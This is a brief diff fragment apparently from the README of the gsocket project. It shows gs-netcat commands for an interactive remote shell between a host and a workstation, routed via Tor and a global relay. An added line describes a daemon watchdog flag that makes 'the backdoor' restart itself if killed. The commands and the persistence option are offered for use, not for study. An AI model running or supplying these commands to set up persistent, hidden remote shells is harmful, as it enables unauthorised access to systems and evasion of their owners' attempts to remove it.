hackerschoice/gsocket/README.md

 $ gs-netcat -k keyfile.txt -l -i    # Host
 $ gs-netcat -k keyfile.txt -T -i    # Workstation (via Tor & Global Socket Relay)
 ```

+Add -D on the host side to run gs-netcat as a daemon and in watchdog-mode: The backdoor will automatically restart if it is ever killed.

 3. Use -k